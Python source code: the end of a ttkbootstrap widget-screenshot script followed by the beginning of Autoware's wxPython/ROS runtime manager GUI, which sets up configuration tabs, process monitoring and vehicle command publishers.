style = Style(theme)
window = style.master
window.title('ttkbootstrap')
ss = Screenshot(window, '../images/date_entry.png')
ttk.Label(window, text='DateEntry', font='Helvetica 10 bold', anchor='center', padding=(0, 5, 0, 0)).pack(side='top', fill='x')
def entry(color, parent):
# child = ttk.Frame(left_frame)
ttk.Label(parent, text=f'{color}.TCalendar', padding=(0, 15, 0, 5)).pack(fill='x')
DateEntry(parent, startdate=datetime(2021, 5, 14), style=f'{color}.TCalendar').pack()
left_frame = ttk.Frame(window, padding=10)
entry('primary', left_frame)
entry('secondary', left_frame)
entry('success', left_frame)
left_frame.pack(side='left')
right_frame = ttk.Frame(window, padding=10)
entry('info', right_frame)
entry('warning', right_frame)
entry('danger', right_frame)
right_frame.pack(side='right')
def screenshot_date_chooser(screenshot_on=True, theme='flatly'):
"""
Get screenshot for date entry
"""
from ttkbootstrap.widgets.calendar import DateChooserPopup
from datetime import datetime
style = Style(theme)
DateChooserPopup(startdate=datetime(2021, 5, 14), style='info.TCalendar')
if __name__ == '__main__':
programs = [
screenshot_button,
screenshot_checkbutton,
screenshot_checkbutton_toolbutton,
screenshot_checkbutton_outline_toolbutton,
screenshot_roundtoggle_toolbutton,
screenshot_squaretoggle_toolbutton,
screenshot_combobox_primary,
screenshot_combobox_secondary,
screenshot_combobox_success,
screenshot_combobox_info,
screenshot_combobox_warning,
screenshot_combobox_danger,
screenshot_date_entry,
screenshot_entry_primary,
screenshot_entry_secondary,
screenshot_entry_success,
screenshot_entry_info,
screenshot_entry_warning,
screenshot_entry_danger,
screenshot_floodgauge_vertical,
screenshot_floodgauge_horizontal,
screenshot_frame,
screenshot_label,
screenshot_labelframe,
screenshot_menubutton,
screenshot_meter,
screenshot_notebook,
screenshot_progressbar_horizontal,
screenshot_progressbar_horizontal_striped,
screenshot_progressbar_vertical,
screenshot_radiobutton,
screenshot_radiobutton_toolbutton,
screenshot_radiobutton_outline_toolbutton,
screenshot_scale_horizontal,
screenshot_scale_vertical,
screenshot_scrollbar_horizontal,
screenshot_scrollbar_vertical,
screenshot_separator_horizontal,
screenshot_separator_vertical,
screenshot_sizegrip,
screenshot_sizegrip_primary,
screenshot_sizegrip_secondary,
screenshot_sizegrip_success,
screenshot_sizegrip_info,
screenshot_sizegrip_warning,
screenshot_sizegrip_danger,
screenshot_spinbox_primary,
screenshot_spinbox_secondary,
screenshot_spinbox_success,
screenshot_spinbox_info,
screenshot_spinbox_warning,
screenshot_spinbox_danger,
screenshot_treeview_primary,
screenshot_treeview_secondary,
screenshot_treeview_success,
screenshot_treeview_info,
screenshot_treeview_warning,
screenshot_treeview_danger,
]
# p_list = []
# for p in programs:
# p_list.append(Process(target=p))
#
# for p in p_list:
# p.start()
# p.join()
screenshot_meter()
# TODO add an application window here to select the type of screenshots I want to do.
|
runtime_manager_dialog.py
|
#!/usr/bin/env python
"""
Copyright (c) 2015, Nagoya University
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of Autoware nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import wx
import wx.lib.buttons
import wx.lib.agw.customtreectrl as CT
import gettext
import os
import re
import sys
import fcntl
import threading
import Queue
import time
import socket
import struct
import shlex
import signal
import subprocess
import psutil
import pty
import yaml
import datetime
import syslog
import rtmgr
import rospy
import std_msgs.msg
from std_msgs.msg import Bool
from decimal import Decimal
from runtime_manager.msg import ConfigRcnn
from runtime_manager.msg import ConfigCarDpm
from runtime_manager.msg import ConfigPedestrianDpm
from runtime_manager.msg import ConfigNdt
from runtime_manager.msg import ConfigNdtMapping
from runtime_manager.msg import ConfigNdtMappingOutput
from runtime_manager.msg import ConfigICP
from runtime_manager.msg import ConfigVoxelGridFilter
from runtime_manager.msg import ConfigRingFilter
from runtime_manager.msg import ConfigDistanceFilter
from runtime_manager.msg import ConfigRandomFilter
from runtime_manager.msg import ConfigWaypointFollower
from runtime_manager.msg import ConfigTwistFilter
from runtime_manager.msg import ConfigVelocitySet
from runtime_manager.msg import ConfigLatticeVelocitySet
from runtime_manager.msg import ConfigCarKf
from runtime_manager.msg import ConfigPedestrianKf
from runtime_manager.msg import ConfigLaneRule
from runtime_manager.msg import ConfigLaneSelect
from runtime_manager.msg import ConfigLaneStop
from runtime_manager.msg import ConfigCarFusion
from runtime_manager.msg import ConfigPedestrianFusion
from tablet_socket.msg import mode_cmd
from tablet_socket.msg import gear_cmd
from tablet_socket.msg import Waypoint
from tablet_socket.msg import route_cmd
from ndt_localizer.msg import ndt_stat
from geometry_msgs.msg import TwistStamped
from geometry_msgs.msg import Vector3
from runtime_manager.msg import accel_cmd
from runtime_manager.msg import steer_cmd
from runtime_manager.msg import brake_cmd
from runtime_manager.msg import indicator_cmd
from runtime_manager.msg import lamp_cmd
from runtime_manager.msg import traffic_light
from runtime_manager.msg import adjust_xy
SCHED_OTHER = 0
SCHED_FIFO = 1
SCHED_RR = 2
PROC_MANAGER_SOCK="/tmp/autoware_proc_manager"
class MyFrame(rtmgr.MyFrame):
def __init__(self, *args, **kwds):
rtmgr.MyFrame.__init__(self, *args, **kwds)
self.all_procs = []
self.all_cmd_dics = []
self.load_dic = self.load_yaml('param.yaml', def_ret={})
self.config_dic = {}
self.Bind(wx.EVT_CLOSE, self.OnClose)
self.params = []
self.all_tabs = []
self.all_th_infs = []
self.log_que = Queue.Queue()
self.log_que_stdout = Queue.Queue()
self.log_que_stderr = Queue.Queue()
self.log_que_show = Queue.Queue()
#
# ros
#
rospy.init_node('runime_manager', anonymous=True)
rospy.Subscriber('to_rtmgr', std_msgs.msg.String, self.RosCb)
self.pub = rospy.Publisher('from_rtmgr', std_msgs.msg.String, queue_size=10)
#
# for Quick Start tab
#
tab = self.tab_qs
self.all_tabs.append(tab)
self.qs_cmd = {}
self.all_cmd_dics.append(self.qs_cmd)
self.qs_dic = self.load_yaml('qs.yaml')
self.add_params(self.qs_dic.get('params', []))
self.setup_buttons(self.qs_dic.get('buttons', {}), self.qs_cmd)
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
for key in self.qs_dic.get('exec_time', {}).get(nm, {}).keys():
(topic, msg, attr) = ( key.split('.') + [ None, None, None ] )[:3]
msg = globals().get(msg)
msg = msg if msg else std_msgs.msg.Float32
attr = attr if attr else 'data'
rospy.Subscriber(topic, msg, self.exec_time_callback, callback_args=(key, attr))
#
# for Setup tab
#
tab = self.tab_setup
self.all_tabs.append(tab)
setup_cmd = {}
self.all_cmd_dics.append(setup_cmd)
dic = self.load_yaml('setup.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons', {}), setup_cmd)
#
# for Map tab
#
tab = self.tab_map
self.all_tabs.append(tab)
self.map_cmd = {}
self.all_cmd_dics.append(self.map_cmd)
self.map_dic = self.load_yaml('map.yaml')
self.add_params(self.map_dic.get('params', []))
self.setup_buttons(self.map_dic.get('buttons', {}), self.map_cmd)
self.tc_point_cloud = self.obj_to_varpanel_tc(self.button_point_cloud, 'path_pcd')
self.tc_area_list = self.obj_to_varpanel_tc(self.button_area_lists, 'path_area_list')
self.label_point_cloud_bar.Destroy()
self.label_point_cloud_bar = BarLabel(tab, ' Loading... ')
self.label_point_cloud_bar.Enable(False)
def hook1G(args):
for f in args.get('func')().split(','):
sz = os.path.getsize(f)
if sz > 1024*1024*1024:
wx.MessageBox("Over 1GB\n\n{}\n({:,})".format(f, sz), caption='Warning')
args = { 'func':self.tc_point_cloud.GetValue }
hook_var = { 'hook':hook1G, 'args':args, 'flags':['every_time'] }
obj = self.button_point_cloud
gdic_v = self.obj_to_gdic(obj, {}).get('path_pcd', {})
gdic_v['hook_var'] = hook_var
#
# for Sensing tab
#
tab = self.tab_sensing
self.all_tabs.append(tab)
self.drv_probe_cmd = {}
self.sensing_cmd = {}
self.all_cmd_dics.append(self.sensing_cmd)
dic = self.load_yaml('sensing.yaml')
self.add_params(dic.get('params', []))
self.create_checkboxes(dic, self.panel_sensing, None, self.drv_probe_cmd, self.sensing_cmd, self.OnSensingDriver)
self.setup_buttons(dic.get('buttons', {}), self.sensing_cmd)
#self.timer = wx.Timer(self)
#self.Bind(wx.EVT_TIMER, self.OnProbe, self.timer)
#self.probe_interval = 10*1000
#if self.checkbox_auto_probe.GetValue():
# self.OnProbe(None)
# self.timer.Start(self.probe_interval)
self.dlg_rosbag_record = MyDialogRosbagRecord(self, cmd_dic=self.sensing_cmd)
buttons_color_hdr_setup(self.dlg_rosbag_record)
sense_cmds_dic = dic.get('cmds', {})
#
# for Computing tab
#
tab = self.tab_computing
self.all_tabs.append(tab)
parent = self.tree_ctrl_0.GetParent()
for i in range(2):
self.obj_get('tree_ctrl_' + str(i)).Destroy()
items = self.load_yaml('computing.yaml')
self.add_params(items.get('params', []))
self.sys_gdic = items.get('sys_gui')
self.sys_gdic['update_func'] = self.update_func
self.computing_cmd = {}
self.all_cmd_dics.append(self.computing_cmd)
for i in range(2):
tree_ctrl = self.create_tree(parent, items['subs'][i], None, None, self.computing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
setattr(self, 'tree_ctrl_' + str(i), tree_ctrl)
self.Bind(CT.EVT_TREE_ITEM_CHECKED, self.OnTreeChecked)
self.setup_buttons(items.get('buttons', {}), self.computing_cmd)
#
# for Sensing tab (cmds)
#
parent = self.tree_ctrl_sense.GetParent()
self.tree_ctrl_sense.Destroy()
tree_ctrl = self.create_tree(parent, sense_cmds_dic, None, None, self.sensing_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_sense = tree_ctrl
#
# for Interface tab
#
tab = self.tab_interface
self.all_tabs.append(tab)
self.interface_cmd = {}
self.all_cmd_dics.append(self.interface_cmd)
self.interface_dic = self.load_yaml('interface.yaml')
self.add_params(self.interface_dic.get('params', []))
self.setup_buttons(self.interface_dic.get('buttons', {}), self.interface_cmd)
self.setup_buttons(self.interface_dic.get('checkboxs', {}), self.interface_cmd)
szr = wx.BoxSizer(wx.VERTICAL)
for cc in self.interface_dic.get('control_check', []):
pdic = {}
prm = self.get_param(cc.get('param'))
for var in prm['vars']:
pdic[ var['name'] ] = var['v']
gdic = self.gdic_get_1st(cc)
panel = ParamPanel(self.panel_interface_cc, frame=self, pdic=pdic, gdic=gdic, prm=prm)
szr.Add(panel, 0, wx.EXPAND)
self.panel_interface_cc.SetSizer(szr)
#
# for Database tab
#
tab = self.tab_database
self.all_tabs.append(tab)
self.data_cmd = {}
self.all_cmd_dics.append(self.data_cmd)
dic = self.load_yaml('data.yaml')
self.add_params(dic.get('params', []))
parent = self.tree_ctrl_data.GetParent()
self.tree_ctrl_data.Destroy()
tree_ctrl = self.create_tree(parent, dic, None, None, self.data_cmd)
tree_ctrl.ExpandAll()
tree_ctrl.SetBackgroundColour(wx.NullColour)
self.tree_ctrl_data = tree_ctrl
#self.setup_config_param_pdic()
if 'buttons' in dic:
self.setup_buttons(dic['buttons'], self.data_cmd)
#
# for Simulation Tab
#
tab = self.tab_simulation
self.all_tabs.append(tab)
self.simulation_cmd = {}
self.all_cmd_dics.append(self.simulation_cmd)
dic = self.load_yaml('simulation.yaml')
self.add_params(dic.get('params', []))
self.setup_buttons(dic.get('buttons'), self.simulation_cmd)
btn = self.button_play_rosbag_play
# setup for rosbag info
gdic = self.obj_to_gdic(btn, {})
gdic_v = dic_getset(gdic, 'file', {})
gdic_v['update_hook'] = self.rosbag_info_hook
tc = self.obj_to_varpanel_tc(btn, 'file')
if tc:
self.rosbag_info_hook( tc.GetValue() )
#vp = self.obj_to_varpanel(btn, 'sim_time')
#self.checkbox_sim_time = vp.obj
#try:
# cmd = ['rosparam', 'get', '/use_sim_time']
# if subprocess.check_output(cmd, stderr=open(os.devnull, 'wb')).strip() == 'true':
# self.checkbox_sim_time.SetValue(True)
#except subprocess.CalledProcessError:
# pass
self.label_rosbag_play_bar.Destroy()
self.label_rosbag_play_bar = BarLabel(tab, ' Playing... ')
self.label_rosbag_play_bar.Enable(False)
#
# for Status tab
#
tab = self.tab_status
self.all_tabs.append(tab)
self.status_cmd = {}
self.all_cmd_dics.append(self.status_cmd)
self.status_dic = self.load_yaml('status.yaml')
self.add_params(self.status_dic.get('params', []))
self.setup_buttons(self.status_dic.get('buttons', {}), self.status_cmd)
font = wx.Font(10, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)
self.label_top_cmd.SetFont(font)
#
# for Topics tab
#
tab = self.tab_topics
self.all_tabs.append(tab)
#
# for All
#
self.bitmap_logo.Destroy()
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_1.png'), 0.2)
self.bitmap_logo = wx.StaticBitmap(self, wx.ID_ANY, bm)
rtmgr.MyFrame.__do_layout(self)
cond = lambda s : s.startswith('tab_')
self.tab_names = [ self.name_get_cond(tab, cond=cond, def_ret='').replace('tab_', '', 1) for tab in self.all_tabs ]
new_btn_grps = ( lambda btn_names, tab_names=self.tab_names :
[ [ self.obj_get('button_{}_{}'.format(bn, tn)) for tn in tab_names ] for bn in btn_names ] )
self.alias_grps = new_btn_grps( ('rosbag', 'rviz', 'rqt') )
self.alias_grps += new_btn_grps( ('android_tablet', 'oculus_rift', 'vehicle_gateway', 'auto_pilot'),
('qs', 'interface') )
for grp in self.alias_grps:
wx.CallAfter(self.alias_sync, get_top(grp))
s = get_tooltip_obj(grp[0])
if s:
for obj in grp[1:]:
set_tooltip_str(obj, s)
# Topics tab (need, after layout for sizer)
self.topics_dic = self.load_yaml('topics.yaml')
self.topics_list = []
self.topics_echo_curr_topic = None
self.topics_echo_proc = None
self.topics_echo_thinf = None
self.topics_echo_que = Queue.Queue()
self.topics_echo_sum = 0
thinf = th_start(self.topics_echo_show_th)
self.all_th_infs.append(thinf)
self.refresh_topics_list()
# waypoint
self.route_cmd_waypoint = [ Waypoint(0,0), Waypoint(0,0) ]
rospy.Subscriber('route_cmd', route_cmd, self.route_cmd_callback)
# topic /xxx_stat
self.stat_dic = {}
for k in [ 'gnss', 'pmap', 'vmap', 'lf' ]:
self.stat_dic[k] = False
name = k + '_stat'
rospy.Subscriber(name, std_msgs.msg.Bool, self.stat_callback, callback_args=k)
# top command thread setup
toprc = os.path.expanduser('~/.toprc')
backup = os.path.expanduser('~/.toprc-autoware-backup')
self.toprc_setup(toprc, backup)
cpu_ibls = [ InfoBarLabel(self, 'CPU'+str(i)) for i in range(psutil.NUM_CPUS) ]
sz = sizer_wrap(cpu_ibls, wx.HORIZONTAL, 1, wx.EXPAND, 0)
self.sizer_cpuinfo.Add(sz, 8, wx.ALL | wx.EXPAND, 4)
self.lb_top5 = []
for i in range(5):
lb = wx.StaticText(self, wx.ID_ANY, '')
change_font_point_by_rate(lb, 0.75)
self.lb_top5.append(lb)
line = wx.StaticLine(self, wx.ID_ANY)
ibl = InfoBarLabel(self, 'Memory', bar_orient=wx.HORIZONTAL)
szr = sizer_wrap(self.lb_top5 + [ line, ibl ], flag=wx.EXPAND | wx.FIXED_MINSIZE)
self.sizer_cpuinfo.Add(szr, 2, wx.ALL | wx.EXPAND, 4)
th_arg = { 'setting':self.status_dic.get('top_cmd_setting', {}),
'cpu_ibls':cpu_ibls, 'mem_ibl':ibl,
'toprc':toprc, 'backup':backup }
thinf = th_start(self.top_cmd_th, th_arg)
self.all_th_infs.append(thinf)
# ps command thread
#thinf = th_start(self.ps_cmd_th, { 'interval':5 })
#self.all_th_infs.append(thinf)
# logout thread
interval = self.status_dic.get('gui_update_interval_ms', 100) * 0.001
tc = self.text_ctrl_stdout
thinf = th_start(self.logout_th, { 'que':self.log_que_stdout, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que_stderr, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
thinf = th_start(self.logout_th, { 'que':self.log_que, 'interval':interval, 'tc':tc } )
self.all_th_infs.append(thinf)
if interval > 0:
thinf = th_start(self.logshow_th, { 'que':self.log_que_show , 'interval':interval , 'tc':tc })
self.all_th_infs.append(thinf)
else:
self.checkbox_stdout.Enable(False)
tc.Enable(False)
# mkdir
paths = [ os.environ['HOME'] + '/.autoware/data/tf',
os.environ['HOME'] + '/.autoware/data/map/pointcloud_map',
os.environ['HOME'] + '/.autoware/data/map/vector_map' ]
for path in paths:
if not os.path.exists(path):
subprocess.call([ 'mkdir', '-p', path ])
# icon
bm = scaled_bitmap(wx.Bitmap(rtmgr_src_dir() + 'autoware_logo_2_white.png'), 0.5)
icon = wx.EmptyIcon()
icon.CopyFromBitmap(bm)
self.SetIcon(icon)
def __do_layout(self):
pass
def OnClose(self, event):
# kill_all
for proc in self.all_procs[:]: # copy
(_, obj) = self.proc_to_cmd_dic_obj(proc)
self.launch_kill(False, 'dmy', proc, obj=obj)
save_dic = {}
for (name, pdic) in self.load_dic.items():
if pdic and pdic != {}:
prm = self.cfg_dic( {'name':name, 'pdic':pdic} ).get('param', {})
no_saves = prm.get('no_save_vars', [])
pdic = pdic.copy()
for k in pdic.keys():
if k in no_saves:
del pdic[k]
save_dic[name] = pdic
if save_dic != {}:
dir = rtmgr_src_dir()
print('saving param.yaml')
f = open(dir + 'param.yaml', 'w')
s = yaml.dump(save_dic, default_flow_style=False)
#print 'save\n', s # for debug
f.write(s)
f.close()
shutdown_proc_manager()
shutdown_sh = self.get_autoware_dir() + '/ros/shutdown'
if os.path.exists(shutdown_sh):
os.system(shutdown_sh)
for thinf in self.all_th_infs:
th_end(thinf)
self.Destroy()
def RosCb(self, data):
print('recv topic msg : ' + data.data)
r = rospy.Rate(10)
rospy.is_shutdown()
r.sleep()
self.pub.publish(data.data)
r.sleep()
def setup_buttons(self, d, run_dic):
for (k,d2) in d.items():
pfs = [ 'button_', 'checkbox_' ]
obj = next( (self.obj_get(pf+k) for pf in pfs if self.obj_get(pf+k)), None)
if not obj:
s = 'button_' + k
obj = StrValObj(s, False)
setattr(self, s, obj)
if not d2 or type(d2) is not dict:
continue
if 'run' in d2:
run_dic[obj] = (d2['run'], None)
set_tooltip(obj, d2)
gdic = self.gdic_get_1st(d2)
if 'param' in d2:
pdic = self.load_dic_pdic_setup(k, d2)
prm = self.get_param(d2.get('param'))
for var in prm.get('vars'):
name = var.get('name')
if name not in pdic and 'v' in var:
pdic[name] = var.get('v')
for (name, v) in pdic.items():
restore = eval( gdic.get(name, {}).get('restore', 'lambda a : None') )
restore(v)
self.add_cfg_info(obj, obj, k, pdic, gdic, False, prm)
pnls = [ gdic.get(var.get('name'), {}).get('panel') for var in prm.get('vars') ]
for pnl in [ gdic.get('panel') ] + pnls:
if pnl:
self.set_param_panel(obj, eval_if_str(self, pnl))
else:
self.add_cfg_info(obj, obj, k, None, gdic, False, None)
def OnGear(self, event):
grp = { self.button_statchk_d : 1,
self.button_statchk_r : 2,
self.button_statchk_b : 3,
self.button_statchk_n : 4 }
self.radio_action(event, grp.keys())
v = grp.get(event.GetEventObject())
if v is not None:
pub = rospy.Publisher('gear_cmd', gear_cmd, queue_size=10)
pub.publish(gear_cmd(gear=v))
def OnLamp(self, event):
pub = rospy.Publisher('lamp_cmd', lamp_cmd, queue_size=10)
msg = lamp_cmd()
msg.l = self.button_statchk_lamp_l.GetValue()
msg.r = self.button_statchk_lamp_r.GetValue()
pub.publish(msg)
def OnIndi(self, event):
pub = rospy.Publisher('indicator_cmd', indicator_cmd, queue_size=10)
msg = indicator_cmd()
msg.l = self.button_statchk_indi_l.GetValue()
msg.r = self.button_statchk_indi_r.GetValue()
pub.publish(msg)
def OnAutoPilot(self, event):
obj = event.GetEventObject()
self.alias_sync(obj)
v = obj.GetValue()
pub = rospy.Publisher('mode_cmd', mode_cmd, queue_size=10)
pub.publish(mode_cmd(mode=v))
def radio_action(self, event, grp):
push = event.GetEventObject()
for b in grp:
v = b.GetValue()
act = None
act = True if b is push and not v else act
act = False if b is not push and v else act
if act is not None:
set_val(b, act)
def stat_label_off(self, obj):
qs_nms = [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]
exec_time = self.qs_dic.get('exec_time', {})
gdic = self.obj_to_gdic(obj, {})
msg = std_msgs.msg.Bool(False)
for k in gdic.get('stat_topic', []):
# exec_time off
if next( (dic for dic in exec_time.values() if k in dic), None):
self.exec_time_callback(std_msgs.msg.Float32(0), (k, 'data'))
else:
self.stat_callback(msg, k)
# Quick Start tab, exec_time off
obj_nm = self.name_get(obj)
nm = next( (nm for nm in qs_nms if 'button_' + nm + '_qs' == obj_nm), None)
for key in exec_time.get(nm, {}):
self.exec_time_callback(std_msgs.msg.Float32(0), (key, 'data'))
def route_cmd_callback(self, data):
self.route_cmd_waypoint = data.point
def stat_callback(self, msg, k):
self.stat_dic[k] = msg.data
if k == 'pmap':
v = self.stat_dic.get(k)
wx.CallAfter(self.label_point_cloud.SetLabel, 'OK' if v else '')
if k in [ 'pmap', 'vmap' ]:
v = self.stat_dic.get('pmap') and self.stat_dic.get('vmap')
wx.CallAfter(self.label_map_qs.SetLabel, 'OK' if v else '')
def exec_time_callback(self, msg, (key, attr)):
msec = int(getattr(msg, attr, 0))
exec_time = self.qs_dic.get('exec_time', {})
(nm, dic) = next( ( (nm, dic) for (nm, dic) in exec_time.items() if key in dic), None)
dic[ key ] = msec
lb = self.obj_get('label_' + nm + '_qs')
if lb:
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
wx.CallAfter(lb.SetLabel, str(sum)+' ms' if sum > 0 else '')
# update Status tab
lb = ''
for nm in [ 'map', 'sensing', 'localization', 'detection', 'mission_planning', 'motion_planning' ]:
dic = exec_time.get(nm, {})
sum = reduce( lambda a,b:a+(b if b else 0), dic.values(), 0 )
if sum > 0:
s = nm + ' : ' + str(sum) + ' ms'
lb += s + '\n'
wx.CallAfter(self.label_node_time.SetLabel, lb)
wx.CallAfter(self.label_node_time.GetParent().FitInside)
#
# Setup tab
#
def OnSetupLocalizer(self, event):
obj = self.button_setup_tf
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
self.update_func(pdic, gdic, prm)
#
# Computing Tab
#
def OnTreeMotion(self, event):
tree = event.GetEventObject()
pt = event.GetPosition()
event.Skip()
(item, flags) = tree.HitTest(pt)
if flags & CT.TREE_HITTEST_ONITEMLABEL == 0:
return
text = item.GetData()
if not text:
return
x = item.GetX()
y = item.GetY()
w = item.GetWidth()
h = item.GetHeight()
(x, y) = tree.CalcScrolledPosition(x, y)
iw = tree.GetItemWindow(item)
w -= iw.GetSize()[0] if iw else 0
if not wx.Rect(x, y, w, h).Contains(pt):
return
(x, y) = tree.ClientToScreen((x, y))
self.tip_info = (tree, text, wx.Rect(x, y, w, h))
if getattr(self, 'tip_timer', None) is None:
self.tip_timer = wx.Timer(self)
self.Bind(wx.EVT_TIMER, self.OnTipTimer, self.tip_timer)
self.tip_timer.Start(200, oneShot=True)
def OnTipTimer(self, event):
if getattr(self, 'tip_info', None):
(tree, text, rect) = self.tip_info
(w, h) = self.GetSize()
wx.TipWindow(tree, text, maxLength=w, rectBound=rect)
def OnTreeChecked(self, event):
self.OnChecked_obj(event.GetItem())
def OnChecked_obj(self, obj):
self.OnLaunchKill_obj(obj)
def OnHyperlinked(self, event):
self.OnHyperlinked_obj(event.GetEventObject())
def OnHyperlinked_obj(self, obj):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return
dic_list_push(gdic, 'dialog_type', 'config')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
def obj_to_add_args(self, obj, msg_box=True):
(pdic, gdic, prm) = self.obj_to_pdic_gdic_prm(obj)
if pdic is None or prm is None:
return None
if 'need_camera_info' in gdic.get('flags', []) and msg_box:
ids = self.camera_ids()
if ids:
var = self.get_var(prm, 'camera_id', {})
var['choices'] = ids
dic_list_push(gdic, 'dialog_type', 'sel_cam')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
else:
pdic['camera_id'] = ''
if 'open_dialog' in gdic.get('flags', []) and msg_box:
dic_list_push(gdic, 'dialog_type', 'open')
klass_dlg = globals().get(gdic_dialog_name_get(gdic), MyDialogParam)
dlg = klass_dlg(self, pdic=pdic, gdic=gdic, prm=prm)
dlg_ret = show_modal(dlg)
dic_list_pop(gdic, 'dialog_type')
if dlg_ret != 0:
return False
self.update_func(pdic, gdic, prm)
s = ''
vars = []
for var in prm.get('vars'):
cmd_param = var.get('cmd_param')
if cmd_param:
vars.append(var)
for var in vars[:]: # copy
cmd_param = var.get('cmd_param')
if cmd_param.get('tail'):
vars.remove(var)
vars.append(var)
for var in vars[:]: # copy
name = var.get('name')
flags = gdic.get(name, {}).get('flags', [])
if 'hide' in flags or 'disable' in flags:
vars.remove(var)
for var in vars:
cmd_param = var.get('cmd_param')
name = var.get('name')
v = pdic.get(name)
if (v is None or v == '') and 'default' in cmd_param:
v = cmd_param.get('default')
if dic_eval_if_str(self, cmd_param, 'must') and (v is None or v == ''):
print 'cmd_param', name, 'is required'
if msg_box:
wx.MessageBox('cmd_param ' + name + ' is required')
return False
if dic_eval_if_str(self, cmd_param, 'only_enable') and not v:
continue
if dic_eval_if_str(self, cmd_param, 'only_disable') and v:
continue
name = cmd_param.get('var_name', name)
unpack = cmd_param.get('unpack')
if unpack is not None:
v = ' '.join( v.split(unpack) )
add = ''
dash = cmd_param.get('dash')
if dash is not None:
add += dash + name
delim = cmd_param.get('delim')
if delim is not None:
str_v = str(v)
if var.get('kind') is None:
str_v = adjust_num_str(str_v)
if var.get('kind') == 'path':
str_v = path_expand_cmd(str_v)
str_v = os.path.expandvars(os.path.expanduser(str_v))
relpath_from = var.get('relpath_from')
if relpath_from:
relpath_from = path_expand_cmd(relpath_from)
relpath_from = os.path.expandvars(os.path.expanduser(relpath_from))
str_v = os.path.relpath(str_v, relpath_from)
add += delim + str_v
if add != '':
s += add + ' '
return s.strip(' ').split(' ') if s != '' else None
def obj_to_pdic_gdic_prm(self, obj, sys=False):
info = self.config_dic.get(obj)
if info is None:
sys_prm = self.get_param('sys')
prm_chk = lambda prm : prm is sys_prm if sys else prm is not sys_prm
info = next( ( v for v in self.config_dic.values() if v.get('obj') is obj and prm_chk(v.get('param')) ), None)
if info is None:
return (None, None, None)
pdic = info.get('pdic')
prm = info.get('param')
gdic = info.get('gdic')
return (pdic, gdic, prm)
def obj_to_gdic(self, obj, def_ret=None):
(_, gdic, _) = self.obj_to_pdic_gdic_prm(obj) if obj else (None, None, None)
return gdic if gdic else def_ret
def cfg_obj_dic(self, arg_dic, sys=False, def_ret=(None,{})):
sys_prm = self.get_param('sys')
prm_chk = {
True : (lambda prm : prm is sys_prm),
False : (lambda prm : prm is not sys_prm),
None : (lambda prm : True) }.get(sys)
arg_dic_chk = lambda dic: all( [ dic.get(k) == v for (k,v) in arg_dic.items() ] )
return next( ( (cfg_obj, dic) for (cfg_obj, dic) in self.config_dic.items() \
if arg_dic_chk(dic) and prm_chk(dic.get('param')) ), def_ret)
def cfg_dic(self, arg_dic, sys=False, def_ret={}):
(_, dic) = self.cfg_obj_dic(arg_dic, sys=sys, def_ret=(None, def_ret))
return dic
def cfg_prm_to_obj(self, arg_dic, sys=False):
return self.cfg_dic(arg_dic, sys=sys).get('obj')
def name_to_pdic_gdic_prm(self, name, sys=False):
d = self.cfg_dic( {'name':name}, sys=sys )
return ( d.get('pdic'), d.get('gdic'), d.get('param') )
def update_func(self, pdic, gdic, prm):
pdic_empty = (pdic == {})
for var in prm.get('vars', []):
name = var.get('name')
gdic_v = gdic.get(name, {})
func = gdic_v.get('func')
if func is None and not pdic_empty:
continue
v = var.get('v')
if func is not None:
v = eval(func) if type(func) is str else func()
pdic[ name ] = v
hook = gdic_v.get('update_hook')
if hook:
hook(v)
hook_var = gdic_v.get('hook_var', {})
every_time = 'every_time' in hook_var.get('flags', [])
if var == gdic.get('update_func_arg_var') or every_time:
hook = hook_var.get('hook')
if hook:
hook(hook_var.get('args', {}))
if 'pub' in prm:
self.publish_param_topic(pdic, prm)
self.rosparam_set(pdic, prm)
